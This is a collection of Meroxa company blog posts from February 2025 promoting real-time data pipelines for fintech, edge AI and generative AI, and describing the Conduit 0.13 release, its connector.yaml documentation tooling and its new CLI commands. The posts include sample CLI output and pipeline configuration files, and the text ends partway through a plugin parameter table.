Meroxa - Blog & Insights

How Real-Time Data Pipelines Drive Financial Insights in Fintech

Dion Keeton — Tue, 18 Feb 2025 11:54:00 GMT

Executive Summary

In the fintech industry, real-time data processing is critical for fraud detection, compliance monitoring, high-frequency trading, and AI-driven customer insights. Traditional batch-based financial data pipelines introduce unacceptable delays, leading to financial losses, regulatory fines, and poor user experiences.

Key Industry Insights:

By implementing real-time data pipelines, fintech companies can:

✅ Prevent fraud before it happens ✅ Deliver AI-powered financial insights instantly

✅ Optimize trading and payment processing with sub-millisecond latency ✅ Ensure regulatory compliance effortlessly

Cut Fraud Losses by 60%—Deploy Real-Time Pipelines Today.

Why Real-Time Data is Critical for Fintech Success

Challenges of Legacy Financial Data Processing

Reduce Compliance Costs with Instant AML & SOX Reporting—Schedule a Demo.

Real-Time Pipeline Architecture for Fintech

Meroxa’s Real-Time Pipeline Architecture, leveraging Databricks, enables fintech companies to process financial transactions instantly. The architecture ingests data from Point-of-Sale (POS) systems and payment gateways, streaming it into Meroxa for real-time enrichment and anomaly detection. The processed data is then stored in Databricks Delta Lake, where AI models analyze transaction patterns, detect fraud, and generate risk scores. Automated fraud prevention and compliance workflows trigger instant alerts and actions, notifying customers, bank administrators, and regulatory teams.

Example flow using Databricks

Key Technologies in Modern Fintech Data Pipelines

Modern fintech data pipelines rely on a high-performance technology stack to ensure real-time data ingestion, processing, storage, AI-driven analytics, and compliance monitoring. Ingestion layers like Kafka, Pulsar, and Meroxa Conduit capture financial transactions and user activity instantly. Stream processing engines such as Apache Flink and Spark Streaming enable fraud detection, anomaly detection, and risk scoring in milliseconds. High-speed databases like ClickHouse, Snowflake, and PostgreSQL provide sub-second querying for compliance and analytics, while AI frameworks like TensorFlow and PyTorch power predictive fraud prevention and credit scoring models. Visualization tools like Grafana and Looker deliver real-time alerts and trading insights, ensuring fintech companies stay ahead in an increasingly data-driven industry.

Eliminate Latency in Fraud Detection—Talk to an Expert Today.

Cost Breakdown: Meroxa's Conduit Platform vs Competitors

When evaluating real-time data pipeline solutions, cost efficiency is critical for fintech companies. Conduit Platform offers a 40% lower infrastructure cost due to its auto-scaling capabilities, eliminating the need for expensive batch processing. Unlike competitors that require manual DevOps management and complex tuning, Meroxa provides a fully managed, low-latency solution with minimal operational overhead.

Optimize Your Fintech Data Stack—Cut Infrastructure & Compliance Costs by 50% with Conduit Platform.

Cost Projections for Different Fintech Segments

Fintech companies across various segments stand to gain significant cost savings and ROI by implementing real-time data pipelines. Digital banking and payments firms can reduce fraud-related chargebacks by 60%, saving over $20M annually, while high-frequency trading platforms can optimize execution speeds to cut slippage costs by $15M+ per year. Lending and credit scoring businesses can lower default rates, leading to $10M in savings, and compliance automation can reduce regulatory fines, saving $8M annually. Fraud prevention and risk management solutions see the biggest impact, with potential savings of $30M+ annually by detecting fraudulent transactions in under 500ms. Across all segments, real-time pipelines deliver high ROI, lower costs, and greater efficiency, making them essential for fintech success.

Projected Cost Savings & ROI by Fintech Segment

All savings are estimations.

Performance Benchmark: Meroxa's Conduit Platform vs Competitors

When it comes to real-time data performance in fintech, Meroxa's Conduit Platform outpaces competitors with sub-500ms AI-powered fraud detection, sub-second transaction latency, and auto-scaling to handle over 1M TPS (transactions per second). Unlike traditional batch-based solutions that introduce delays, Meroxa ensures instant compliance reporting, seamless fraud prevention, and optimized trading execution. Compared to alternatives like Fivetran, Kafka Streams, and Confluent Cloud, Meroxa delivers lower costs, minimal DevOps overhead, and built-in AI/ML integrations for unmatched efficiency and scalability in financial data processing.

Achieve Sub-500ms Fraud Detection & Real-Time Compliance!

Conclusion & Next Steps

Conduit Platform provides a scalable, low-latency, AI-powered solution designed specifically for fraud prevention, high-frequency trading, credit risk assessment, and compliance automation. With sub-second transaction processing, auto-scaling capabilities, and built-in compliance features, our platform enables fintech CTOs to future-proof their infrastructure, unlock cost savings, and drive long-term business growth.

👉 Request a Demo | Follow us on Twitter, LinkedIn, and YouTube for more insights and updates!

Unlocking the Power of Edge AI with Real-Time Streaming: From Sensors to Insights Using Meroxa

DeVaris Brown — Tue, 11 Feb 2025 22:33:00 GMT

In today’s fast-paced digital world, the ability to process and analyze data right at its source is more than just an operational advantage—it’s a strategic imperative. As industries evolve and data volumes surge, the need for real-time insights has never been greater. This blog post explores how edge and on-device AI are transforming industries, and how Meroxa is at the forefront of this revolution by enabling seamless, low-latency data capture and processing.

Low-Latency Inference: The Heart of Real-Time Decision-Making

Why Low-Latency Matters

At its core, low-latency inference is about reducing the delay between data generation and actionable insights. Traditional cloud-based architectures often involve sending data over long distances for processing—a delay that, in mission-critical applications, can mean the difference between success and failure. By moving the inference process closer to where the data is created, edge AI dramatically cuts down these delays, ensuring faster and more reliable decision-making.

Real-World Applications

Imagine a self-driving car navigating a busy city. Every millisecond counts as the vehicle processes sensor data to detect obstacles and plan safe routes. By performing inference on-device, the car can react instantly, bypassing the latency introduced by cloud communication. Similarly, industrial IoT applications—such as predictive maintenance on factory equipment—rely on real-time analysis to prevent costly downtime. For instance, a drone engaged in infrastructure inspection can instantly process visual data to identify structural anomalies, ensuring timely maintenance interventions. In these scenarios, on-device AI not only improves safety and operational efficiency but also minimizes the dependence on constant cloud connectivity. Systems can operate more efficiently, safeguarding both assets and human lives.

Hardware Acceleration: Powering the Edge

The Rise of Specialized Processors

The push for real-time performance has led to the integration of specialized hardware accelerators in edge devices. GPUs, TPUs, and FPGAs are increasingly common in applications where rapid data processing is essential. These processors are designed to handle the intensive computations required by modern AI algorithms, delivering high performance without compromising on energy efficiency.

Real-World Applications in Critical Industries

In healthcare, portable diagnostic devices and patient monitoring systems are being enhanced with on-device AI capabilities. Accelerators in these devices process medical images or sensor data in real time, facilitating faster diagnoses and immediate care decisions without compromising patient data privacy. Similarly, manufacturing robotics benefit from hardware acceleration by achieving precise, real-time control that ensures both productivity and safety on the factory floor.

These specialized accelerators not only enhance processing speed but also reduce energy consumption—a crucial factor in edge environments where power efficiency is paramount. By offloading computationally intensive tasks to dedicated hardware, edge devices can maintain high performance while operating within the physical constraints of their deployment scenarios.

Real-Time Data Pipelines: The Backbone of Edge AI

Enabling Continuous, Actionable Insights

For edge AI to deliver its promise of instantaneous insights, a robust and agile data pipeline is essential. Real-time data pipelines capture, ingest, process, and route data as it’s generated, allowing on-device AI models to analyze it almost immediately. This end-to-end approach minimizes delay and maximizes the impact of every data point collected.

How Meroxa Drives Real-Time Data Pipelines at the Edge

Meroxa’s platform is designed to excel in this environment. By providing a unified framework for real-time data capture and processing, Meroxa enables organizations to bridge the gap between edge devices and actionable insights. Here’s how Meroxa’s approach drives success:

Seamless Data Ingestion: Meroxa efficiently captures data from diverse edge sources, ensuring that no critical piece of information is lost. Whether it’s sensor readings from industrial equipment or real-time telemetry from autonomous vehicles, the platform ingests data with minimal latency.
Streamlined Processing: Once data is ingested, Meroxa’s real-time pipelines process and transform it on the fly. This enables AI models to perform inference immediately, ensuring that insights are generated and acted upon in near real time.
Scalable Integration: Meroxa’s architecture is built to scale, accommodating the growing volume and variety of data generated at the edge. This scalability is essential for large enterprises that operate across multiple geographies and require a reliable, unified data infrastructure.
Enhanced Collaboration: By integrating seamlessly with on-device intelligence, Meroxa not only accelerates data processing but also facilitates a collaborative ecosystem where edge and cloud systems work in tandem. This synergy ensures that organizations can leverage the best of both worlds—immediate, on-device insights and the broader analytical capabilities of cloud-based systems.

Real-World Use Cases: Data Acquisition in Action

Visualizing the data acquisition flow can clarify how Meroxa’s platform integrates with edge and on-device AI to deliver real-time insights. Consider these two real-world examples:

Healthcare Clinical Trials

In the context of clinical trials, a multitude of patient-generated data—ranging from wearable sensor metrics to diagnostic imaging—is collected and processed. The following diagram illustrates a typical data flow using Meroxa:

Explanation:

Patient Devices / Clinical Trial Sensors: These include wearable devices and diagnostic machines that continuously generate health-related data.
Edge Gateway: Data is initially captured at the edge, reducing transmission delays.
Meroxa Data Ingestion Platform: Meroxa ingests and standardizes data from various devices, ensuring consistency.
Real-Time Data Pipeline: The ingested data is processed in real time, enabling immediate analytics.
On-Device Inference & Analytics: Local AI models analyze the data, offering prompt insights for patient monitoring and clinical decision-making.
Cloud Analytics / Clinical Dashboards: Processed insights are then aggregated and visualized on centralized dashboards for further analysis and regulatory reporting.

Manufacturing

In manufacturing environments, real-time data acquisition is critical for maintaining operational efficiency and safety. The following diagram demonstrates how Meroxa integrates with manufacturing processes:

Explanation:

Manufacturing Equipment Sensors: Sensors embedded in machinery generate continuous operational data (temperature, vibration, etc.).
Edge Data Aggregator: Data from multiple sensors is collected at the edge, reducing latency and bandwidth use.
Meroxa Data Ingestion: The platform ingests aggregated data, standardizing it across various sources.
Real-Time Data Pipeline: Data is processed in real time to detect anomalies and trigger immediate responses.
On-Device AI for Process Control: Local AI models perform rapid analysis, enabling automated adjustments in machinery operation.
Manufacturing Analytics Dashboard: Insights are visualized on dashboards, allowing for proactive maintenance and process optimization.

Conclusion: Empowering the Future with Meroxa

Edge and on-device AI are no longer futuristic concepts—they are transforming the way industries operate today. By reducing latency through on-device inference, leveraging the power of specialized hardware, and deploying agile real-time data pipelines, organizations can unlock a new level of efficiency, safety, and innovation.

Meroxa’s platform is not just about data capture; it’s about transforming that data into actionable insights, exactly when and where they are needed. For innovative companies seeking to drive competitive advantage and operational excellence, partnering with Meroxa means embracing a future where technology works seamlessly to empower every decision.

From Data to Decisions: How Generative AI is Transforming Business in Real-Time

DeVaris Brown — Tue, 11 Feb 2025 15:53:00 GMT

At the current pace of this digital landscape, harnessing real-time data has become a game-changer for businesses. As the CEO of Meroxa, I've witnessed firsthand how generative AI not only enhances data processing but fundamentally reshapes how organizations extract value from their continuous streams of information. Whether you're a mid-market enterprise or a Fortune 1000 company, embracing these technological advancements leads to transformative improvements in decision-making and operational efficiency. In this post, I'll explore how integrating large language models (LLMs) into data pipelines and leveraging conversational analytics are setting new standards for real-time applications.

Integrating LLMs into Real-Time Data Workflows

The New Era of Data Pipelines

At its core, integrating LLMs into data workflows embeds intelligence throughout the data processing lifecycle—from ingestion to analysis. Traditional data pipelines focused on collecting and transforming data for batch processing. Now, with generative AI, organizations are shifting toward models that transform real-time data into actionable insights instantly.

Consider a financial institution processing millions of transactions per minute. By incorporating a GPT-based LLM into its pipeline, the institution can automatically flag unusual patterns, assess risks in real time, and generate concise summaries of emerging market trends. This capability enhances operational agility while empowering decision-makers with immediate insights into potential risks and opportunities.

Real-World Example and Benefits

In retail—where consumer behavior and market sentiment shift rapidly—companies can integrate generative AI into streaming data feeds to monitor social media trends and point-of-sale transactions simultaneously. The LLM analyzes vast data volumes, creating real-time summaries that highlight changes in consumer preferences and emerging product trends. This enables marketing teams to quickly adjust campaigns while supply chain managers optimize inventory based on immediate demand signals.

Key Benefits:

Speed and Agility: Real-time insights enable instant responses to emerging events.
Resource Optimization: Automated summarization frees skilled analysts to focus on strategic work.
Scalability: Modern AI models efficiently handle high-volume streaming data.
Improved Accuracy: Continuous model updates ensure insights stay timely and relevant.

Technical Workflow Diagram

Let me show you how a modern real-time data pipeline integrates LLMs using Meroxa for data ingestion and processing - this diagram breaks down the key components and how they work together:

Raw data flows from multiple sources through Meroxa's platform for ingestion and preprocessing, then through LLM analysis, finally generating automated insights for dashboards and alerts.

Challenges to Consider

While the benefits are significant, integrating LLMs into real-time pipelines comes with key challenges. Data quality is paramount—the system requires clean, consistent, and secure information to function effectively. Processing real-time data through large models demands substantial computational power. To address this, organizations need scalable infrastructure and may need to implement edge computing to reduce latency. Additionally, robust security and data governance protocols must protect sensitive information throughout its journey.

The Rise of Conversational Analytics

From Dashboards to Dialogues

The business intelligence (BI) landscape is evolving. Traditional dashboards and static reports are giving way to conversational analytics platforms that let users interact with data through natural language queries. Instead of waiting for detailed reports, executives can now ask questions like "What were our top-selling products last month, and what factors drove their success?"—and receive immediate, context-rich responses powered by GPT-based foundation models.

Enhancing User Experience and Decision-Making

Conversational analytics democratizes data access across organizations. Advanced data analysis is no longer confined to technical teams—executives, managers, and frontline employees can now engage with data using everyday language. This accessibility speeds up decision-making by delivering insights promptly in a user-friendly format.

Interactive, chat-like interfaces transform data interaction into a dynamic dialogue. This approach cultivates data literacy throughout the organization, preventing insights from being siloed within select groups. By removing technical barriers, businesses enable their entire workforce to participate in data-driven decision-making.

Technical Architecture for Conversational Analytics

In this architecture, a natural language query initiated by a user is processed by a conversational interface that leverages a GPT-based model. The query is then further refined and processed before data is retrieved and transformed by Meroxa’s real-time data store. This transformed data is used to generate an immediate, actionable response for the user.

Driving Business Value

For technical business decision-makers, the value proposition of conversational analytics is clear and compelling:

Enhanced Accessibility: Natural language queries eliminate dependence on technical specialists, democratizing data insights across the organization.
Faster Insights: Real-time, interactive querying bridges the gap between data generation and action—essential in today's fast-moving markets.
Cost Efficiency: Automated analysis reduces the operational costs traditionally associated with BI systems.
Competitive Edge: Organizations that quickly interpret and act on real-time data gain a decisive market advantage.

Strategic Implications for Business Leaders

Embracing the Future Today

The integration of generative AI into real-time applications isn't just a technological trend—it's a strategic imperative. For technical business decision-makers, the ability to extract immediate, actionable insights from data streams drives revenue growth, enhances operational efficiency, and mitigates risks.

At Meroxa, we empower organizations to seamlessly integrate these cutting-edge technologies into their existing data workflows. By connecting real-time data ingestion with AI-driven analytics, we help businesses unlock generative AI's full potential.

Overcoming Barriers and Building a Data-Driven Culture

While adopting generative AI presents challenges—from data quality to computational demands—the rewards far outweigh the investment. Enhanced decision-making, operational agility, and market competitiveness await organizations that commit to this transformation. Success hinges on fostering a culture that embraces data-driven insights and invests in the right infrastructure and talent.

Whether you're just beginning your digital transformation or looking to accelerate it, now is the time to explore how generative AI can revolutionize your data strategy. The strategic advantages of streamlined data pipelines and intuitive analytics tools are undeniable.

Conclusion

In today's world of constant change and endless data flows, generative AI in real-time applications isn't optional—it's essential. By combining LLMs with data pipelines and conversational analytics, businesses can achieve unprecedented levels of insight, efficiency, and agility. At Meroxa, we envision data not just as something to collect, but as a strategic asset that powers informed decisions and creates lasting competitive advantages.

I urge technical business decision-makers, from mid-market enterprises to Fortune 1000 companies, to embrace these transformative technologies. This step will position your organization to not just succeed in a data-driven world, but to pioneer the next wave of business innovation.

🎉 Celebrating Three Years of Conduit: A Revolution in Real-Time Data Streaming!

Dion Keeton — Mon, 10 Feb 2025 12:30:00 GMT

✨ Three years ago, we set out to transform real-time data movement with Conduit—a game-changer in the world of streaming technology! 💡 Ready to experience the power of real-time data? Try Conduit today and start building your data pipelines!—a game-changer in the world of streaming technology! 💡 If you haven't yet, dive in now by exploring our GitHub repository and joining our thriving community on Discord! 🌍 As we celebrate this milestone, we want to take a moment to reflect on why we built Conduit, express our deep appreciation for our incredible community, and highlight some key moments that have shaped our journey.

Why We Built Conduit

In today’s AI data-driven world, organizations need real-time data integration that is both scalable and easy to use. However, existing solutions often presented significant challenges—complex architectures, high costs, and lack of flexibility. We built Conduit to address these gaps by offering a developer-friendly, open-source data streaming platform that is lightweight, flexible, and easy to deploy. Our vision is “A world where real-time data is the default.” Our mission is “Enable anyone to leverage real-time data regardless of technical ability.” Learn more about our vision here.

Messages from the team

To mark this special occasion, we’re reflecting on our journey, sharing insights from our team, and celebrating the incredible support from our community. Hear from the Conduit team and discover how collaboration has fueled innovation in real-time data streaming.

“Not every collaboration fuels innovation in the same way—after all, no two collaborations are alike. And let me be honest: for much of the time, we’re doing what most teams do—working across distant time zones, brainstorming, reviewing code, debating design documents, and holding sync meetings.

What truly sets my team apart is the difference in how we handle our differences. Like any group, we sometimes clash with completely opposing views. Sometimes we push our opinions passionately; other times, we pragmatically decide that progress matters more than the perfect solution. And occasionally, we admit that, as much as we love our own ideas, someone else’s might be the better path forward. This honest exchange of thoughts keeps us continually improving while moving forward together.” - Haris Osmanagić, Software Engineer

“I've worked on Conduit since its infancy, watching it grow from a closed-source internal tool to a mature open-source project. Over the years, we've faced many challenges—technical, organizational, and personal—but we've always found a way through as a team. That's no surprise, given the team's talent and dedication. I'm proud of what we've achieved so far and excited for Conduit's future and growing community!”
- Lovro Mažgon, Software Engineer

“Looking back on the last four years of developing Conduit, it’s been a remarkable journey to see how an idea has grown into a thriving open-source project celebrating its third birthday. Our globally distributed team is super collaborative and supportive, and we’re never afraid to bring new perspectives to the table or challenge each other. I’m proud of the way we plan together, set clear goals, and consistently hit our milestones.

As we prepare for the highly anticipated 1.0 release, I’m continuously reminded of how special this team is, the passion for innovation, and the commitment that we share. I’m also excited to see Conduit continue to grow and reach new heights, and can’t wait for the success we’ll achieve in the years to come.” - Maha Hajja, Software Engineeer

A Huge Thank You to Our Amazing Community!

🚀 Join our growing ecosystem and be part of the real-time data revolution! Contribute, share your feedback, and engage with fellow developers. Get involved on GitHub!

From the very beginning, the Conduit community has been the driving force behind its success. Your feedback, contributions, and enthusiasm have helped shape Conduit into what it is today. Companies such as Netflix, Uber, Airbnb, Google, Microsoft, and IBM have starred our repository, reflecting the widespread trust and adoption of our platform. Check out our GitHub repository here.

Key Community Milestones

First Commit: Made by @jmar910 on January 19, 2022. View the commit here.
First Public PR Contribution: @heath submitted the first PR on January 21, 2022, improving documentation. See it here.
First Public Comment on Discord: Heath left the first comment on January 21, 2022, reinforcing open-source collaboration. Join our Discord here.
First Community Connector Submission: The first community connector Tiny Bird was introduced on Oct 25, 2022. Details here.

Conduit's Evolution: Major Milestones & Game-Changing Releases!

Version 0.1.0: Laid the foundation for real-time data integration.
Version 0.6.0: Introduced lifecycle events and improved metrics.
Version 0.7.0: Added Node.js support and schema registry updates.
Version 0.9.0: Major overhaul of processors and improved transformations.
Version 0.11.0: Comprehensive schema support and new connectors.
Version 0.12.0: Introduced Pipeline Recovery for resilient data streaming.
Version 0.13.0: Celebrating 3 years with enhanced real-time collaboration and performance metrics.

Explore the full changelog here.

Looking Ahead

Want to shape the future of real-time data streaming? Stay ahead with Conduit's latest developments and contribute to the next generation of data infrastructure. Join us today! We are more excited than ever about the future of Conduit.

Our roadmap includes:

Improved scalability
More out-of-the-box connectors
Deeper AI-driven analytics

Stay updated on our latest developments on our blog.

🙏 THANK YOU to our users, contributors, and supporters! Don't just follow the data revolution—lead it! Start using Conduit, share your success stories, and help us build the future of real-time streaming. Want to be part of our future? The time is NOW! 🌟 Join the movement and help us shape the future of data streaming!

Here’s to the next chapter of Conduit!

New Release Conduit 0.13: Advanced Automation, New CLI, and 5x Performance Gains

Dion Keeton — Fri, 07 Feb 2025 10:47:00 GMT

Conduit 0.13 is here, delivering major enhancements to developer experience, automation, and performance optimization. This release focuses on:

Automated documentation synchronization for connectors, ensuring up-to-date and consistent documentation.
A powerful new Conduit CLI, providing fine-grained control over pipeline and connector management.
5x output performance improvements, drastically reducing processing latency and optimizing resource utilization.
Deprecation of the User Interface, aligning with our focus on CLI-driven workflows.
Expanded CLI capabilities, providing a more comprehensive command set for Conduit management.

Let’s dive into the technical details of what’s new, why these changes matter, and how you can leverage them.

🚀 Upgrade to Conduit 0.13 today! Download the latest release and start building faster, more efficient pipelines. Read the release notes.

💡 Have questions? Join our Discord community and discuss with fellow developers!

Deprecation of the User Interface

Conduit no longer includes a built-in User Interface. This decision aligns with our focus on providing a streamlined, command-line-centric workflow that better fits the needs of our users.

For those seeking a graphical interface, the fully featured UI is available as part of the Conduit Platform, our separate product offering designed to meet enterprise requirements.

📢 Need a UI? Explore the Conduit Platform for a fully managed experience.

Expanded Command-Line Interface (CLI) Capabilities

Why This Matters

The Conduit CLI has been enhanced to offer more comprehensive management capabilities. By expanding available commands, we provide developers with a powerful toolset for configuring and maintaining data pipelines.

How It Works

To run the Conduit service, simply execute:

$ conduit run

Running the conduit command without arguments will display all available commands and options:

$ conduit
Conduit CLI is a command-line tool that helps you interact with and manage Conduit.

Usage:
  conduit [flags]
  conduit [command]

Available Commands:
  config            Shows the configuration to be used when running Conduit.
  connector-plugins Manage Connector Plugins
  connectors        Manage Conduit Connectors
  help              Help about any command
  init              Initialize Conduit with a configuration file and directories.
  open              Open in a web browser
  pipelines         Initialize and manage pipelines
  processor-plugins Manage Processor Plugins
  processors        Manage Processors
  run               Run Conduit
  version           Show the current version of Conduit.

Flags:
      --api.grpc.address string   address where Conduit is running
      --config.path string        path to the configuration file
  -h, --help                      help for conduit
  -v, --version                   show the current Conduit version

Use "conduit [command] --help" for more information about a command.

With these improvements, users can now execute all necessary Conduit operations seamlessly from the command line.

⚡ Try it now! Use $ conduit --help to explore all available commands.

📖 New to Conduit? Check out our blog for more detail to get started quickly!

Automating Connector Documentation with `connector.yaml`

Why This Matters

Maintaining accurate, up-to-date documentation for Conduit's extensive connector ecosystem has been a challenge. Manual updates to README files often lag behind code changes, leading to inconsistencies that can slow down development and debugging.

How We Solved It

Previously, each connector’s configuration was stored separately in README files, requiring manual updates every time a configuration parameter changed. This approach was inefficient and error-prone. To address this, Conduit 0.13 introduces connector.yaml, a structured metadata file that centralizes all essential connector details and automates documentation synchronization.

🛠 Start automating your connector documentation today! Implement connector.yaml in your repository and run the conn-sdk-cli readmegen command to ensure your documentation is always up to date.

⚡ Try it now! Run conn-sdk-cli readmegen to sync your documentation instantly.

📘 Need help? Follow our developer guide for best practices. Read more details in our blog.

5x Performance Boost for Output Processing

Why This Matters

For high-throughput data streaming, performance is critical. Previously, output processing could become a bottleneck in large-scale workloads, leading to latency and inefficiencies.

How We Improved It

Conduit 0.13 introduces a 5x increase in output throughput, achieved through:

Parallelized Processing - Output tasks now run concurrently, reducing execution bottlenecks.
Optimized Memory Allocation - Enhanced buffer management leads to lower memory overhead and increased efficiency.
Lock-Free Data Processing - Reduced contention on shared resources significantly speeds up write operations.

🚀 Optimize your workflows today! Upgrade to Conduit 0.13 to experience these performance improvements firsthand.

📊 Curious about the benchmarks? Read our performance deep dive.

Get Started with Conduit 0.13 Today

The enhancements in Conduit 0.13 make it a more powerful, developer-friendly platform for building scalable real-time pipelines. Whether you’re automating documentation, leveraging the new CLI, or enjoying high-throughput data movement, this release delivers meaningful improvements.

What’s Next?

✅ Start using the Conduit CLI: $ conduit --help ✅ Automate connector documentation with connector.yaml ✅ Experience performance gains with 5x output speed improvements ✅ Read the full release notes here

💬 We’d love your feedback! Join the conversation on Discord or start a discussion in our GitHub Discussions. 🚀

📝 Stay Updated! Follow us on Twitter, LinkedIn, and YouTube for more insights and updates!

Automating documentation for 100+ connectors

Haris Osmanagić — Wed, 05 Feb 2025 19:27:00 GMT

Managing real-time data pipelines across hundreds of different systems requires consistent, accurate, and up-to-date documentation. With Conduit 0.13, we’ve automated connector documentation using connector.yaml, ensuring seamless synchronization between code and documentation.

The Challenge: Keeping Connector Documentation in Sync

Conduit supports reading and writing data to hundreds of systems. As the number of connectors grows, maintaining consistent documentation becomes increasingly difficult. Traditionally, connector configurations were documented in README files within repositories, requiring manual updates whenever a parameter changed. Over time, this led to outdated information and increased developer friction.

Goals

1: Connector configuration is documented and always up-to-date

A connector’s configuration is usually documented in the README file in the connector’s repository. As the configurations change in code, it’s easy to forget about updating the README file, especially if changes are not too big (like changing a parameter’s default value, the description, for example.). We also need this process to be automated.

2: A central place with all connector information

Having a central place with all the connector information makes it easier to explore Conduit, and find the needed components for a pipeline that needs to be built and configured. This place is our website, where we already have a connectors list, and where we will be adding dedicated documentation pages for each connector.

3: Easy to use for developers

All the documentation needs to be in sync with the configuration code written by a connector's developer. Every connector has a description that can become quite lengthy and, in our experience, is very cumbersome to write in the code. Plus, there are no formatting options. Hence, our goal was to give developers an easy way to sync the documentation with code and easily describe what a connector is doing.

The solution

The source of truth for a connector’s configuration is in the code, in the configuration structs. That means that the process that updates a connector’s README file and our website needs to read the configuration code (eventually). However, the code is not enough. As mentioned above, connector descriptions are best placed outside the connector code.

That led us to a solution where a connector’s specification (name, description, configuration parameters, etc.) are written to a file that can easily be read by other tools, i.e. uses a widely used file format. That’s how connector.yaml was born.

What is `connector.yaml`?

connector.yaml is a file that contains information about a connector and its parameter validations. It’s central to all of our tooling that ensures the documentation is always up-to-date and can be collected into a single place.

connectors.yaml lives in the root of a connector's repository. The following is an example of the file connector'sconnector.yaml:

version: "1.0"
specification:
  name: file
  summary: A file source and destination plugin for Conduit.
  description: |-
    The file source allows you to listen to a local file and
    detect any changes happening to it. Each change will create a new record. The
    destination allows you to write record payloads to a destination file, each new record payload is appended to the file in a new line.
  version: v0.10.0
  author: Meroxa, Inc.
  source:
    parameters:
      - name: path
        description: Path is the file path used by the connector to read/write records.
        type: string
        default: ""
        validations:
          - type: required
            value: ""
    # other parameters

A connector developer can then simply run conn-sdk-cli readmegen (as explained here), which will synchronize the README file with the configuration structs. Our documentation website uses the connector.yaml file to build a dedicated documentation page for a connector.

How is a `connector.yaml` populated?

The first part of a connector.yaml (name, summary, description, version, author) is filled out manually by the connector developer. connector.yaml is used in Markdown files (in the connector’s README and on our website), so you can use Markdown code here!

Our conn-sdk-cli tool updates the configuration parameters in connector.yaml automatically, as part of running go generate. Detailed instructions on how to do that can be found here.

Next steps

You’ll find more information about how to write a Conduit connector here. If you’d like to take a look at some real-world examples, feel free to explore our existing connectors. ⚡

Try conn-sdk-cli readmegen now and streamline your connector documentation!

💬 Join the Conduit community! Discuss with fellow developers on Discord or contribute via GitHub Discussions. Follow us on Twitter, LinkedIn, and YouTube for more insights and updates!

Introducing the New Conduit CLI: A Powerful Tool for Managing Your Pipelines

Maha Mustafa — Wed, 05 Feb 2025 18:53:00 GMT

Release 0.13 of Conduit brings to you our new Conduit CLI, designed to make configuring, managing, and running Conduit smoother than ever. Built with our open-source Ecdysis library, this CLI is a game-changer for users looking for efficiency and ease of use.

Why the Conduit CLI Matters

Before this update, managing Conduit pipelines and connectors often required a mix of API calls, configuration files, and going through documentation. The new Conduit CLI changes the game by offering a centralized command-line that transforms these tasks into a simple, accessible tool.

With Conduit CLI, you can now:

Manage connectors, connector plugins, processors, processor plugins, and pipelines effortlessly
List and describe Conduit components directly from the terminal
Configure and Run Conduit components without leaving the CLI
Easily initialize Conduit and get started

Built on Ecdysis: A Flexible Library for CLI Tools

The Conduit CLI is powered by Ecdysis, an open-source Go library designed to simplify CLI tool development. Ecdysis is built around spf13/cobra, acting as a wrapper to enhance its capabilities.

Ecdysis provides a structured approach to building command-line applications, with many features that include the following, among others:

A robust command structure for defining and organizing commands efficiently.
Automatic configuration parsing, reducing the need for manual setup.
Flexible flag parsing, making it easy to customize command behavior.

By leveraging Ecdysis, Conduit CLI offers a consistent and extendable experience, making it easier for developers to interact with Conduit’s components using a well-architected CLI framework.

Getting Started with Conduit CLI

To check all the available commands, simply run:

$ conduit --help

This will output a list of commands, as of the moment of writing, these include:

Available Commands:
  config            Shows the configuration to be used when running Conduit.
  connector-plugins Manage Connector Plugins.
  connectors        Manage Conduit Connectors.
  pipelines         Initialize and manage pipelines.
  processors        Manage Processors.
  run               Run Conduit.
  version           Show the current version of Conduit.

Each command is designed to give you control and observability over your data streaming pipelines. Let’s take a closer look at some of these key functionalities.

Initializing Conduit

The command conduit init creates the directories where you add your pipeline configuration files, connector binaries, and processor binaries. It also creates the file conduit.yaml that contains all the configuration parameters that Conduit supports.

$ conduit init

Created directory: processors
Created directory: connectors
Created directory: pipelines
Configuration file written to conduit.yaml

Conduit has been initialized!

To quickly create an example pipeline, run 'conduit pipelines init'.
To see how you can customize your first pipeline, run 'conduit pipelines init --help'.

You can also use the init command to initialize a pipeline configuration file with your choice of source and destination, example:

$ conduit pipelines init file-to-pg --source file --destination postgres

This will initialize a pipeline configuration file, with all of the parameters for the source and destination connectors, by default the created file will be under the folder ./pipelines , and in this case it would look like:

version: "2.2"
pipelines:
  - id: example-pipeline
    status: running
    name: "file-to-pg"
    connectors:
      - id: example-source
        type: source
        plugin: "file"
        settings:
          # Path is the file path used by the connector to read/write records.
          # Type: string
          # Required
          path: ""
          ..
          .. # more params
          ..
          ..
      - id: example-destination
        type: destination
        plugin: "postgres"
        settings:
          # Key represents the column name for the key used to identify and
          # update existing rows.
          # Type: string
          # Optional
          key: ""
          ..
          ..
          .. # more params
          ..
          ..
          # Table is used as the target table into which records are inserted.
          # Type: string
          # Optional
          table: '{{ index .Metadata "opencdc.collection" }}'
          # URL is the connection string for the Postgres database.
          # Type: string
          # Required
          url: ""

Managing Connector Plugins

One of the new additions to the Conduit CLI is the ability to list and describe available connector plugins.

Listing Connector Plugins

To list all available connector plugins, run:

$ conduit connector-plugins list

This command displays a table of all the built-in and standalone connector plugins available to Conduit:

+-------------------------------------+----------------------------------------+
|                 NAME                |                SUMMARY                 |
+-------------------------------------+----------------------------------------+
| builtin:file@v0.9.0                 | A file source and destination plugin.  |
| builtin:kafka@v0.11.1               | A Kafka source and destination plugin. |
| standalone:dynamodb@f9aeeee-dirty   | A DynamoDB source plugin for Conduit.  |
| standalone:grpc-client@v0.1.0       | A gRPC Source & Destination Client.    |
+-------------------------------------+----------------------------------------+

Describing a Specific Plugin

To get more details about a specific plugin, use the describe command followed by the plugin name. For example, to learn more about the PostgreSQL plugin:

$ conduit connector-plugins describe builtin:postgres@v0.10.1

This provides a detailed breakdown of the plugin, including the author, version, description, summary, and the parameters for both the source and destination. Here’s an example of what you’ll see:

Name: builtin:postgres@v0.10.1
Summary: A PostgreSQL source and destination plugin for Conduit.
Author: Meroxa, Inc.
Version: v0.10.1

Source Parameters:
+--------+--------+----------------------------------+---------+-------------+
| NAME   | TYPE   | DESCRIPTION                      | DEFAULT | VALIDATIONS |
+--------+--------+----------------------------------+---------+-------------+
| url    | string | Connection string for database.  | ""      | [required]  |
| tables | string | List of tables to listen to.     | ""      | [required]  |
+--------+--------+----------------------------------+---------+-------------+

Destination Parameters:
+------+--------+------------------+---------------------------------+----------+
| NAME | TYPE   | DESCRIPTION      |              DEFAULT            |VALIDATION|
+------+--------+------------------+---------------------------------+----------+
| url  | string | Connection string| ""                              |[required]|
